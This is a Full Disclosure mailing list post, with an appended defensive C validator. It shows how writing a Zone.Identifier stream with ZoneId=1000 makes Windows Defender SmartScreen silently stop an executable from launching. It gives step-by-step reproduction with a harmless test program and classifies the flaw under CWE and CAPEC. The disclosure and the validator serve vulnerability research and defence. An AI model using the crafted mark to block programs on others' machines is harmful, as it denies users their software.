Full Disclosure mailing list archives

Defense in depth -- The Microsoft way (part 74): Windows Defender SmartScreen is rather DUMB, it allows denial of service


From: "Stefan Kanthak" <stefan.kanthak () nexgo de>
Date: Fri, 2 Apr 2021 23:06:07 +0200

Hi @ll,

the following is a shortened version of
<https://skanthak.homepage.t-online.de/offender.html#case64021>

With Windows 8, Microsoft introduced Windows Defender SmartScreen as
replacement for the Attachment Manager introduced with Windows XP SP2
(the first release of Windows after they started Trustworthy Computing).

The Attachment Manager adds an Alternate Data Stream named Zone.Identifier
to files downloaded from the Internet or other computers, attachments
stored by mail clients etc. as so-called "Mark of the Web" to indicate
their (untrusted) origin.

With SmartScreen, the "Mark of the Web" allows a denial of service to be
performed.

Demonstration:
~~~~~~~~~~~~~~

1. Compile and link the following minimal Win32 program:

--- dummy.c ---
#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

__declspec(noreturn)
VOID WINAPI wWinMainCRTStartup(VOID)
{
   ExitProcess(MessageBox(HWND_DESKTOP, L"Hello World!", L"Dummy", MB_OK));
}
--- EOF ---

   CL.exe /Zl /W4 /GAFy /c dummy.c
   LINK.exe /Link /Entry:wWinMainCRTStartup /NoDefaultLib /Release /SubSystem:Windows dummy.obj kernel32.lib user32.lib

2. Execute dummy.exe per double-click: it displays a message box titled
   "Dummy" with message text "Hello World!"

3. Add a "Mark of the Web" specifying the Internet zone to dummy.exe:
   execute NOTEPAD.exe dummy.exe:Zone.Identifier, answer the question
   whether you want to create a new file with [Yes], type the 2 lines
   between --- ... ---, close the editor and save the changes:

--- dummy.exe:Zone.Identifier ---
[ZoneTransfer]
ZoneId=3
--- EOF ---

4. Execute dummy.exe per double-click: Windows Defender SmartScreen
   displays a warning message titled "Windows protected your PC"
   with message text "Windows Defender SmartScreen prevented an
   unrecognized app from starting. Running this app might put your
   PC at risk. [...]"

   After clicking the button [Run anyway] the program executes and
   displays its message box.

5. Add a "Mark of the Web" specifying a custom zone to dummy.exe:
   execute NOTEPAD.exe dummy.exe:Zone.Identifier, answer the question
   whether you want to create a new file with [Yes], type the 2 lines
   between --- ... ---, close the editor and save the changes:

--- dummy.exe:Zone.Identifier ---
[ZoneTransfer]
ZoneId=1000
--- EOF ---

6. Execute dummy.exe per double-click: NO REACTION!

The Common Weaknesses and Exposures classifies such misbehavior,
which here results in a denial of service, as
- CWE-20: Improper Input Validation
  <https://cwe.mitre.org/data/definitions/20.html>
- CWE-1284: Improper Validation of Specified Quantity in Input
  <https://cwe.mitre.org/data/definitions/1284.html>
- CWE-1286: Improper Validation of Syntactic Correctness of Input
  <https://cwe.mitre.org/data/definitions/1286.html>
- CWE-1287: Improper Validation of Specified Type of Input
  <https://cwe.mitre.org/data/definitions/1287.html>

The Common Attack Pattern Enumeration and Classification lists it as
- <https://capec.mitre.org/data/definitions/210.html>
  CAPEC-210: Abuse Existing Functionality

stay tuned, and far away from such dysfunctional crap
Stefan Kanthak

JFTR: before/without SmartScreen, the Attachment Manager discards
      a "Mark of the Web" with unsupported zones, i.e. ZoneId > 4

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
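The validation SmartScreen omits, written here as an added example (not Kanthak's code): a small C classifier for the text of a Zone.Identifier stream that, like the Attachment Manager described in the JFTR, treats any ZoneId outside 0..4 as unsupported instead of silently doing nothing. The function and enum names are mine, and reading the stream from `dummy.exe:Zone.Identifier` is left to the caller; the sample stream in main() is constructed from step 5 of the post.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Only URLZONE ids 0 (LocalMachine) .. 4 (UntrustedSites) are defined; these
 * are the ZoneIds the Attachment Manager accepts, per the JFTR above. */
enum { ZONE_MIN = 0, ZONE_MAX = 4 };
typedef enum {
    MOTW_NONE,        /* no [ZoneTransfer] section: file is not marked */
    MOTW_VALID,       /* ZoneId in 0..4: SmartScreen should evaluate it */
    MOTW_UNSUPPORTED, /* ZoneId outside 0..4: the ZoneId=1000 case */
    MOTW_MALFORMED    /* section present but ZoneId missing or not a number */
} motw_result;
/* Classify the text of a Zone.Identifier stream, one INI-style line at a time.
 * On MOTW_VALID / MOTW_UNSUPPORTED the parsed ZoneId is stored in *zone. */
motw_result classify_zone_identifier(const char *text, long *zone)
{
    int in_section = 0, seen_section = 0;
    const char *p = text;
    while (*p != '\0') {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        while (len > 0 && (p[len - 1] == '\r' || p[len - 1] == ' ')) len--;
        if (len > 0 && p[0] == '[') {
            in_section = (len == 14 && memcmp(p, "[ZoneTransfer]", 14) == 0);
            seen_section |= in_section;
        } else if (in_section && len > 7 && memcmp(p, "ZoneId=", 7) == 0) {
            char *end;
            long v = strtol(p + 7, &end, 10);
            /* require plain digits up to end of line: no sign, space or junk */
            if (!isdigit((unsigned char)p[7]) || end != p + len)
                return MOTW_MALFORMED;
            *zone = v;
            return (v < ZONE_MIN || v > ZONE_MAX) ? MOTW_UNSUPPORTED : MOTW_VALID;
        }
        p = eol ? eol + 1 : p + strlen(p);
    }
    return seen_section ? MOTW_MALFORMED : MOTW_NONE;
}

int main(void)
{
    /* constructed sample: the ZoneId=1000 stream from step 5 of the post */
    long zone = 0;
    motw_result r = classify_zone_identifier("[ZoneTransfer]\r\nZoneId=1000\r\n", &zone);
    printf("ZoneId=%ld -> %s\n", zone, r == MOTW_UNSUPPORTED ? "unsupported zone" : "other");
    return 0;
}
```

A hardened launcher would refuse to run (or fall back to the Internet-zone prompt) on MOTW_UNSUPPORTED and MOTW_MALFORMED rather than treating an unparseable mark as "no mark".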
